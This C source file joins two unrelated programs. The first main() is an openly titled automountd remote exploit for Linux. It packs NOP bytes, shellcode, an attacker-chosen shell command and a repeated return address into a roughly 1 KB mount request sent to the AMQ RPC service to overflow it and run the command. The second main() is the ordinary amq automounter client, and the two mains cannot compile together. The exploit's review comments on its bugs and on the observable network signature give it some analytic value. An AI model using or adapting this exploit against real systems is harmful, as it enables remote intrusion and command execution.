int main ( int argc, char *argv[] ) {
    /*
     * Entry point.  Builds one AMQ mount request from the -h/-p/-c/-o/-u
     * options and hands it to amqproc_mount_1() at the bottom.  The comments
     * below are review notes: they flag undefined behaviour and unchecked
     * input in the original and do not change the code.
     */
    CLIENT *cl;
    struct timeval tv;
    struct sockaddr_in sa;
    struct hostent *he;
    /* host and cc start indeterminate: when -h or -c is absent, the
     * "if (!host || !cc ...)" test below reads an uninitialised pointer (UB).
     * res is declared but never used. */
    char buf[8000], *path = buf, comm[200], *host, *cc;
    int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0;
    /* Fixed value printed as "RET" further down, adjusted by -o.  0xbffff505
     * does not fit a 32-bit signed long, so on ILP32 targets the conversion
     * is implementation-defined. */
    long addr = 0xbffff505;

    /* Option parsing.  -p and -o go through atoi(): no range check and no
     * way to tell a genuine "0" from unparsable input. */
    while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1)
        switch (c) {
        case 'h':
            host = optarg;
            break;

        case 'p':
            port = atoi(optarg);
            break;

        case 'c':
            cc = optarg;
            break;

        case 'o':
            offset = atoi ( optarg);
            break;

        case 'u':
            udp = 1;
            break;

        default:
            damn = 1;
            break;
        }

    /* usage() is defined elsewhere; the code assumes it does not return. */
    if (!host || !cc || damn) usage ( argv[0]);

    /* Resolve -h; fall back to a dotted quad when the name lookup fails.
     * The bcopy copies he->h_length bytes into the 4-byte sin_addr without
     * checking h_length: resolver data is trusted unconditionally. */
    sa.sin_family = AF_INET;
    he = gethostbyname ( host);
    if (!he) {
        if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) {
            printf ( "unknown host, try again pal!\n");
            exit ( 0);
        }
    } else
        bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
    sa.sin_port = htons(port);
    /* RPC_ANYSOCK lets the RPC library open the socket; tv is the UDP
     * retry/timeout interval (10 s) used only on the -u path. */
    sd = RPC_ANYSOCK;
    tv.tv_sec = 10;
    tv.tv_usec = 0;

    /* Bounded copy of -c, rejected at 160 bytes or more.  Otherwise the
     * terminator is overwritten with ';' and indices up to 159 are filled
     * with 'A', so comm is no longer NUL-terminated (comm[160..199] stay
     * uninitialised): the strlen(comm) calls here and in the copy loop
     * below read indeterminate bytes (UB). */
    snprintf ( comm, sizeof(comm), "%s", cc);
    if ( strlen(comm) >= 160) {
        printf ( "command too long\n");
        exit (0);
    } else {
        comm[strlen(comm)] = ';';
        for ( x = strlen(comm); x < 160; x++)
            comm[x] = 'A';
    }

    /* Fill buf: NOP bytes, then shellcode, then comm (NOP and shellcode are
     * defined elsewhere).  The bound 1001-(strlen(shellcode)+strlen(comm))
     * is size_t arithmetic: if the sum exceeds 1001 it wraps to a huge value
     * and the loop writes far past buf[8000]; the int x is converted to
     * unsigned for the comparison. */
    addr += offset;
    for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++)
        buf[x] = NOP;

    for ( y = 0; y < strlen(shellcode); x++, y++)
        buf[x] = shellcode[y];

    for ( y = 0; y < strlen(comm); x++, y++)
        buf[x] = comm[y];

    /* %x with a long argument is a format/argument mismatch (UB on LP64);
     * %lx would match. */
    printf ( "SDI automountd remote exploit for linux\n");
    printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset);

    /* Pad the remainder up to index 1020 with addr, least significant
     * byte first. */
    for ( ; x < 1020; x+=4) {
        buf[x  ] = (addr & 0x000000ff);
        buf[x+1] = (addr & 0x0000ff00) >> 8;
        buf[x+2] = (addr & 0x00ff0000) >> 16;
        buf[x+3] = (addr & 0xff000000) >> 24;
    }

    /* buf is not terminated before this strlen(): bytes 1020..7999 are
     * uninitialised, so the computed length is indeterminate and the '\0'
     * lands at an arbitrary position (UB). */
    buf[strlen(buf)] = '\0';

    /* TCP client by default, UDP with -u; exit(-1) reports as status 255. */
    if (!udp) {
        if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) ==
                NULL)
        {
            clnt_pcreateerror("clnt_create");
            exit (-1);
        }
    } else {
        if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) ==
                NULL)
        {
            clnt_pcreateerror("clnt_create");
            exit (-1);
        }
    }
    printf ( "PORT %d \n", ntohs(sa.sin_port));
    printf ( "Command: %s \n", cc);

    /* The whole buffer goes out as the mount argument.  From the defender's
     * side this is the observable: an AMQ mount request whose argument is
     * roughly 1 KB of mostly NOP bytes, far longer than any real path. */
    amqproc_mount_1 (&path, cl);

    clnt_destroy ( cl);

    /* No explicit return: main falls off the end. */
}
/*
 * MAIN
 */
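/*
 * Send one setopt request to the daemon.
 *
 * clnt   - connected RPC client
 * as_opt - AMOPT_* selector
 * as_str - option argument (may be the empty string)
 *
 * Returns the daemon's status word, or NULL when the call got no reply.
 * The pointer presumably refers to the rpcgen stub's static reply buffer,
 * so it is only valid until the next call.
 */
static int *
send_setopt(CLIENT *clnt, int as_opt, char *as_str)
{
	amq_setopt opt;

	opt.as_opt = as_opt;
	opt.as_str = as_str;
	return amqproc_setopt_1(&opt, clnt);
}

/*
 * amq entry point: parse options, connect to the automounter on the
 * selected host (TCP first, UDP fallback), then perform each requested
 * operation.  Exits with the number of failed operations collapsed to
 * 0 (all good) or 1 (at least one error), or 1 on a usage error.
 */
int
main(int argc, char *argv[])
{
	int nodefault = 0, opt_ch, errs = 0, s;
	struct sockaddr_in server_addr;
	struct hostent *hp;
	CLIENT *clnt;
	char *server;

	/*
	 * Parse arguments.  Every option except -h sets nodefault so that
	 * the default action (export the whole mount tree) is skipped once
	 * any explicit request has been made.  The flag variables and
	 * def_server are file-scope globals defined elsewhere.
	 */
	while ((opt_ch = getopt(argc, argv, "fh:l:msuvx:D:M:")) != -1)
		switch (opt_ch) {
		case 'f':
			flush_flag = 1;
			nodefault = 1;
			break;

		case 'h':
			def_server = optarg;
			break;

		case 'l':
			logfile = optarg;
			nodefault = 1;
			break;

		case 'm':
			minfo_flag = 1;
			nodefault = 1;
			break;

		case 's':
			stats_flag = 1;
			nodefault = 1;
			break;

		case 'u':
			unmount_flag = 1;
			nodefault = 1;
			break;

		case 'v':
			getvers_flag = 1;
			nodefault = 1;
			break;

		case 'x':
			xlog_optstr = optarg;
			nodefault = 1;
			break;

		case 'D':
			debug_opts = optarg;
			nodefault = 1;
			break;

		case 'M':
			mount_map = optarg;
			nodefault = 1;
			break;

		default:
			errs = 1;
			break;
		}

	/*
	 * -u needs at least one directory argument.  This is the only place
	 * that check is needed: optind does not move again before the
	 * per-argument loop below, so the old "goto show_usage" branch there
	 * could never be reached and has been dropped.
	 */
	if (optind == argc && unmount_flag)
		errs = 1;

	if (errs) {
		fprintf(stderr, "usage: %s [-fmsuv] [-h hostname] "
		    "[directory ...]\n", __progname);
		exit(1);
	}

	server = def_server;

	/*
	 * Resolve the server.  A failed lookup is tolerated only for the
	 * literal localhost name, which is faked as 127.0.0.1 below.
	 */
	if ((hp = gethostbyname(server)) == 0 && strcmp(server, localhost) != 0) {
		fprintf(stderr, "%s: Can't get address of %s\n", __progname, server);
		exit(1);
	}
	bzero(&server_addr, sizeof server_addr);
	server_addr.sin_family = AF_INET;
	if (hp) {
		/*
		 * Copy exactly sizeof sin_addr, never hp->h_length, so an
		 * oversized length from the resolver cannot overrun the
		 * structure.
		 */
		bcopy((void *)hp->h_addr, (void *)&server_addr.sin_addr,
			sizeof(server_addr.sin_addr));
	} else {
		/* fake "localhost" */
		server_addr.sin_addr.s_addr = htonl(0x7f000001);
	}

	/*
	 * Create RPC endpoint.  privsock() is defined elsewhere (presumably
	 * it binds a reserved port -- confirm).  Try TCP first; if that
	 * fails, close the socket and retry over UDP with TIMEOUT.
	 */
	s = privsock(SOCK_STREAM);
	clnt = clnttcp_create(&server_addr, AMQ_PROGRAM, AMQ_VERSION, &s, 0, 0);
	if (clnt == 0) {
		close(s);
		s = privsock(SOCK_DGRAM);
		clnt = clntudp_create(&server_addr, AMQ_PROGRAM,
		    AMQ_VERSION, TIMEOUT, &s);
	}
	if (clnt == 0) {
		fprintf(stderr, "%s: ", __progname);
		clnt_pcreateerror(server);
		exit(1);
	}

	/*
	 * Control debugging.  A negative status means the daemon has no
	 * debug support at all; a positive one means the setting itself
	 * was rejected; no reply is treated as a failure.
	 */
	if (debug_opts) {
		int *rc = send_setopt(clnt, AMOPT_DEBUG, debug_opts);
		if (rc && *rc < 0) {
			/* message was missing its newline in the original */
			fprintf(stderr,
			    "%s: daemon not compiled for debug\n", __progname);
			errs = 1;
		} else if (!rc || *rc > 0) {
			fprintf(stderr,
			    "%s: debug setting for \"%s\" failed\n",
			    __progname, debug_opts);
			errs = 1;
		}
	}

	/*
	 * Control logging: any non-zero status (or no reply) is a failure.
	 */
	if (xlog_optstr) {
		int *rc = send_setopt(clnt, AMOPT_XLOG, xlog_optstr);
		if (!rc || *rc) {
			fprintf(stderr, "%s: setting log level to \"%s\" failed\n",
			    __progname, xlog_optstr);
			errs = 1;
		}
	}

	/*
	 * Control log file.
	 */
	if (logfile) {
		int *rc = send_setopt(clnt, AMOPT_LOGFILE, logfile);
		if (!rc || *rc) {
			fprintf(stderr, "%s: setting logfile to \"%s\" failed\n",
			    __progname, logfile);
			errs = 1;
		}
	}

	/*
	 * Flush map cache.  The option takes no argument; an empty string
	 * is sent so the XDR string is well formed.
	 */
	if (flush_flag) {
		int *rc = send_setopt(clnt, AMOPT_FLUSHMAPC, "");
		if (!rc || *rc) {
			fprintf(stderr,
			    "%s: amd on %s cannot flush the map cache\n",
			    __progname, server);
			errs = 1;
		}
	}

	/*
	 * Mount info: one pass to compute column widths, one to print.
	 * Note that a failure here is reported but does not set errs,
	 * matching the original behaviour.
	 */
	if (minfo_flag) {
		int dummy;
		amq_mount_info_list *ml = amqproc_getmntfs_1(&dummy, clnt);
		if (ml) {
			int mwid = 0, dwid = 0, twid = 0;
			show_mi(ml, Calc, &mwid, &dwid, &twid);
			mwid++; dwid++; twid++;
			show_mi(ml, Full, &mwid, &dwid, &twid);
		} else {
			fprintf(stderr, "%s: amd on %s cannot provide mount info\n",
			    __progname, server);
		}
	}

	/*
	 * Mount map.  The request is repeated while the daemon returns a
	 * negative status (assumed to mean "try again" -- confirm against
	 * amd); there is no retry cap, so a daemon that keeps answering
	 * negatively will spin here.  A positive status is an errno value
	 * from the daemon; no reply is reported as ETIMEDOUT.  As in the
	 * original, this failure does not set errs.
	 */
	if (mount_map) {
		int *rc;
		do {
			rc = amqproc_mount_1(&mount_map, clnt);
		} while (rc && *rc < 0);
		if (!rc || *rc > 0) {
			if (rc)
				errno = *rc;
			else
				errno = ETIMEDOUT;
			fprintf(stderr, "%s: could not start new ", __progname);
			/* fixed typo: "autmount" */
			perror("automount point");
		}
	}

	/*
	 * Get Version.  The returned string is freed here; the outer
	 * pointer is owned by the stub.
	 */
	if (getvers_flag) {
		amq_string *spp = amqproc_getvers_1((void *)0, clnt);
		if (spp && *spp) {
			printf("%s.\n", *spp);
			free(*spp);
		} else {
			fprintf(stderr, "%s: failed to get version information\n",
			    __progname);
			errs = 1;
		}
	}

	/*
	 * Apply the required operation to every remaining argument: an
	 * unmount request with -u, otherwise a per-directory stats dump.
	 * With no arguments, fall back to -s statistics or, when nothing
	 * explicit was asked for, to the full export listing.
	 */
	if (optind < argc) {
		do {
			char *fs = argv[optind++];
			if (unmount_flag) {
				/*
				 * Unmount request; the reply carries no status
				 * to check.
				 */
				amqproc_umnt_1(&fs, clnt);
			} else {
				/*
				 * Stats request
				 */
				amq_mount_tree_p *mtp = amqproc_mnttree_1(&fs, clnt);
				if (mtp) {
					amq_mount_tree *mt = *mtp;
					if (mt) {
						int mwid = 0, dwid = 0, twid = 0;

						/* first pass sizes the columns */
						show_mt(mt, Calc, &mwid, &dwid, &twid);
						mwid++;
						dwid++;
						twid++;

						printf("%-*.*s Uid   Getattr "
						    "Lookup RdDir   RdLnk   "
						    "Statfs Mounted@\n",
						    dwid, dwid, "What");
						show_mt(mt, Stats, &mwid, &dwid, &twid);
					} else {
						fprintf(stderr,
						    "%s: %s not automounted\n",
						    __progname, fs);
					}
					/* release the XDR-decoded tree */
					xdr_pri_free(xdr_amq_mount_tree_p, mtp);
				} else {
					fprintf(stderr, "%s: ", __progname);
					clnt_perror(clnt, server);
					errs = 1;
				}
			}
		} while (optind < argc);
	} else if (stats_flag) {
		amq_mount_stats *ms = amqproc_stats_1((void *)0, clnt);
		if (ms) {
			show_ms(ms);
		} else {
			fprintf(stderr, "%s: ", __progname);
			clnt_perror(clnt, server);
			errs = 1;
		}
	} else if (!nodefault) {
		amq_mount_tree_list *mlp = amqproc_export_1((void *)0, clnt);
		if (mlp) {
			enum show_opt e = Calc;
			int mwid = 0, dwid = 0, pwid = 0;

			/* Calc pass to size the columns, then a Short pass to print. */
			while (e != ShowDone) {
				/* unsigned: the rpcgen length field is unsigned,
				 * which avoids a sign-compare in the loop test */
				unsigned int i;

				for (i = 0; i < mlp->amq_mount_tree_list_len; i++) {
					show_mt(mlp->amq_mount_tree_list_val[i],
					    e, &mwid, &dwid, &pwid);
				}
				mwid++;
				dwid++;
				pwid++;
				if (e == Calc)
					e = Short;
				else if (e == Short)
					e = ShowDone;
			}
		} else {
			fprintf(stderr, "%s: ", __progname);
			clnt_perror(clnt, server);
			errs = 1;
		}
	}

	exit(errs);
}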